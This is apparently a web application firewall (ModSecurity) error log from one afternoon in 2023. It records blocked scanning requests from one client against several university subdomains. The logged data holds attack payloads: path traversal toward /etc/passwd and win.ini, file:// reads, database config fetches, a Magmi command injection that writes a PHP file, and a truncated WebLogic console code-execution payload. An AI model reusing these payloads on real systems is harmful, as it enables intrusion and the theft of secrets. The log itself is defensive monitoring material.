[Tue Aug 29 11:46:31.426934 2023] [:error] [pid 2228] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14J8Co-f0AAAi0JP0AAAAK"]
[Tue Aug 29 11:46:31.498947 2023] [:error] [pid 2247] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:url: file:///etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/api/geojson"] [unique_id "ZO14J8Co-f0AAAjH@tMAAAAI"]
[Tue Aug 29 11:46:31.518414 2023] [:error] [pid 2247] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:url: file:///etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/api/geojson"] [unique_id "ZO14J8Co-f0AAAjH@tQAAAAI"]
[Tue Aug 29 11:46:31.530336 2023] [:error] [pid 2242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:url: file:///etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/api/geojson"] [unique_id "ZO14J8Co-f0AAAjCa88AAAAB"]
[Tue Aug 29 11:46:31.531583 2023] [:error] [pid 2157] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:url: file:///etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/api/geojson"] [unique_id "ZO14J8Co-f0AAAhtjmMAAAAq"]
[Tue Aug 29 11:46:31.608193 2023] [:error] [pid 2157] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:file: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/download/index.php"] [unique_id "ZO14J8Co-f0AAAhtjmYAAAAq"]
[Tue Aug 29 11:46:31.665715 2023] [:error] [pid 2157] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:test_handle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  = ( found within ARGS:test_handle: com.tangosol.coherence.mvel2.sh.ShellSession('weblogic.work.ExecuteThread currentThread = (weblogic.work.ExecuteThread)Thread.currentThread(); weblogic.work.WorkAdapter adapter = currentThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField(\\x22connectionHandler\\x22);field.setAccessible(true);Object obj = field.get(adapter);weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImp..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/console/images/%2e%2e%2fconsole.portal"] [unique_id "ZO14J8Co-f0AAAhtjmgAAAAq"]
[Tue Aug 29 11:46:32.369934 2023] [:error] [pid 2251] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:url: file:///etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/api/geojson"] [unique_id "ZO14KMCo-f0AAAjL8N0AAAAR"]
[Tue Aug 29 11:46:32.373021 2023] [:error] [pid 2233] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:style. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c/ found within ARGS:style: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c/etc\\x5cpasswd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/webmail/calendar/minimizer/index.php"] [unique_id "ZO14KMCo-f0AAAi5uIAAAAAS"]
[Tue Aug 29 11:46:32.413517 2023] [:error] [pid 2233] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:picUrl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ./../ found within ARGS:picUrl: ./../config/database.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/public/index.php/material/Material/_download_imgage"] [unique_id "ZO14KMCo-f0AAAi5uIIAAAAS"]
[Tue Aug 29 11:46:33.359013 2023] [:error] [pid 2203] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:target. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:target: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14KcCo-f0AAAib56EAAAAA"]
[Tue Aug 29 11:46:33.376148 2023] [:error] [pid 2239] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:picUrl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ./../ found within ARGS:picUrl: ./../config/database.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/public/index.php/material/Material/_download_imgage"] [unique_id "ZO14KcCo-f0AAAi-RC0AAAAH"]
[Tue Aug 29 11:46:33.376821 2023] [:error] [pid 2247] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:picUrl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ./../ found within ARGS:picUrl: ./../config/database.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/public/index.php/material/Material/_download_imgage"] [unique_id "ZO14KcCo-f0AAAjH@tsAAAAI"]
[Tue Aug 29 11:46:33.379794 2023] [:error] [pid 2131] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:picUrl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ./../ found within ARGS:picUrl: ./../config/database.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/public/index.php/material/Material/_download_imgage"] [unique_id "ZO14KcCo-f0AAAhT34sAAAAD"]
[Tue Aug 29 11:46:33.380084 2023] [:error] [pid 2137] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:picUrl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ./../ found within ARGS:picUrl: ./../config/database.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/public/index.php/material/Material/_download_imgage"] [unique_id "ZO14KcCo-f0AAAhZRqMAAAAG"]
[Tue Aug 29 11:46:33.445431 2023] [:error] [pid 1988] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:target. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:target: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14KcCo-f0AAAfEB@YAAAAO"]
[Tue Aug 29 11:46:33.458915 2023] [:error] [pid 2250] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:target. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:target: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14KcCo-f0AAAjKypsAAAAQ"]
[Tue Aug 29 11:46:33.461576 2023] [:error] [pid 2247] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:target. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:target: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO14KcCo-f0AAAjH@t8AAAAI"]
[Tue Aug 29 11:46:33.500075 2023] [:error] [pid 2250] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:target. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:target: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14KcCo-f0AAAjKyp0AAAAQ"]
[Tue Aug 29 11:46:34.382330 2023] [:error] [pid 2252] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:InternalFile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../ found within ARGS:InternalFile: ../../../../../../../../../../../../../../Windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO14KsCo-f0AAAjM6@QAAAAT"]
[Tue Aug 29 11:46:34.392025 2023] [:error] [pid 2203] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:InternalFile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../ found within ARGS:InternalFile: ../../../../../../../../../../../../../../Windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO14KsCo-f0AAAib56YAAAAA"]
[Tue Aug 29 11:46:34.418449 2023] [:error] [pid 2137] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:target. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:target: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14KsCo-f0AAAhZRqcAAAAG"]
[Tue Aug 29 11:46:34.431033 2023] [:error] [pid 1988] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:InternalFile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../ found within ARGS:InternalFile: ../../../../../../../../../../../../../../Windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO14KsCo-f0AAAfEB@wAAAAO"]
[Tue Aug 29 11:46:34.443449 2023] [:error] [pid 2203] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:InternalFile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../ found within ARGS:InternalFile: ../../../../../../../../../../../../../../Windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO14KsCo-f0AAAib56gAAAAA"]
[Tue Aug 29 11:46:34.447902 2023] [:error] [pid 2251] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:InternalFile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../ found within ARGS:InternalFile: ../../../../../../../../../../../../../../Windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO14KsCo-f0AAAjL8OkAAAAR"]
[Tue Aug 29 11:46:35.400463 2023] [:error] [pid 2157] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:InternalFile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../ found within ARGS:InternalFile: ../../../../../../../../../../../../../../Windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO14K8Co-f0AAAhtjm4AAAAq"]
[Tue Aug 29 11:46:35.411394 2023] [:error] [pid 2247] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:REINDEX:phpcli. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x22<? found within ARGS:REINDEX:phpcli: echo \\x22<?php phpinfo();\\x22 > /var/www/html/magmi/web/info.php; php "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/magmi/web/magmi_saveprofile.php"] [unique_id "ZO14K8Co-f0AAAjH@ucAAAAI"]
[Tue Aug 29 11:46:35.414425 2023] [:error] [pid 2131] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:REINDEX:phpcli. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x22<? found within ARGS:REINDEX:phpcli: echo \\x22<?php phpinfo();\\x22 > /var/www/html/magmi/web/info.php; php "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/magmi/web/magmi_saveprofile.php"] [unique_id "ZO14K8Co-f0AAAhT35YAAAAD"]
[Tue Aug 29 11:46:35.417546 2023] [:error] [pid 2155] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:REINDEX:phpcli. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x22<? found within ARGS:REINDEX:phpcli: echo \\x22<?php phpinfo();\\x22 > /var/www/html/magmi/web/info.php; php "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/magmi/web/magmi_saveprofile.php"] [unique_id "ZO14K8Co-f0AAAhrqS4AAAAo"]
[Tue Aug 29 11:46:35.421553 2023] [:error] [pid 2253] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:REINDEX:phpcli. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x22<? found within ARGS:REINDEX:phpcli: echo \\x22<?php phpinfo();\\x22 > /var/www/html/magmi/web/info.php; php "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/magmi/web/magmi_saveprofile.php"] [unique_id "ZO14K8Co-f0AAAjN0NQAAAAU"]
[Tue Aug 29 11:46:35.428106 2023] [:error] [pid 2242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:REINDEX:phpcli. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x22<? found within ARGS:REINDEX:phpcli: echo \\x22<?php phpinfo();\\x22 > /var/www/html/magmi/web/info.php; php "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/magmi/web/magmi_saveprofile.php"] [unique_id "ZO14K8Co-f0AAAjCa@QAAAAB"]
[Tue Aug 29 11:46:35.447082 2023] [:error] [pid 2163] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:picUrl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ./../ found within ARGS:picUrl: ./../config/database.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/public/index.php/material/Material/_download_imgage"] [unique_id "ZO14K8Co-f0AAAhzvkIAAAAx"]
[Tue Aug 29 11:46:38.477327 2023] [:error] [pid 2163] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:REINDEX:phpcli. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x22<? found within ARGS:REINDEX:phpcli: echo \\x22<?php phpinfo();\\x22 > /var/www/html/magmi/web/info.php; php "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/magmi/web/magmi_saveprofile.php"] [unique_id "ZO14LsCo-f0AAAhzvlQAAAAx"]
[Tue Aug 29 11:46:39.435112 2023] [:error] [pid 2252] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:file: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/usr-cgi/logdownload.cgi"] [unique_id "ZO14L8Co-f0AAAjM6-IAAAAT"]
[Tue Aug 29 11:46:39.472536 2023] [:error] [pid 2163] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:file: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/usr-cgi/logdownload.cgi"] [unique_id "ZO14L8Co-f0AAAhzvl0AAAAx"]
[Tue Aug 29 11:46:39.474046 2023] [:error] [pid 2253] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:file: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/usr-cgi/logdownload.cgi"] [unique_id "ZO14L8Co-f0AAAjN0OQAAAAU"]
[Tue Aug 29 11:46:39.473749 2023] [:error] [pid 2239] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:file: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/usr-cgi/logdownload.cgi"] [unique_id "ZO14L8Co-f0AAAi-REYAAAAH"]
[Tue Aug 29 11:46:39.481465 2023] [:error] [pid 2144] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:file: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/usr-cgi/logdownload.cgi"] [unique_id "ZO14L8Co-f0AAAhgoPAAAAAb"]
[Tue Aug 29 11:46:40.481589 2023] [:error] [pid 2163] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:file: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/usr-cgi/logdownload.cgi"] [unique_id "ZO14MMCo-f0AAAhzvmIAAAAx"]
[Tue Aug 29 11:46:41.382433 2023] [:error] [pid 2137] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../ found within ARGS:name: /../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/webapi/file/transfer"] [unique_id "ZO14McCo-f0AAAhZRrAAAAAG"]
[Tue Aug 29 11:46:41.402815 2023] [:error] [pid 2248] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../ found within ARGS:name: /../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/webapi/file/transfer"] [unique_id "ZO14McCo-f0AAAjIhicAAAAJ"]
[Tue Aug 29 11:46:41.433708 2023] [:error] [pid 2163] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../ found within ARGS:name: /../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/webapi/file/transfer"] [unique_id "ZO14McCo-f0AAAhzvmcAAAAx"]
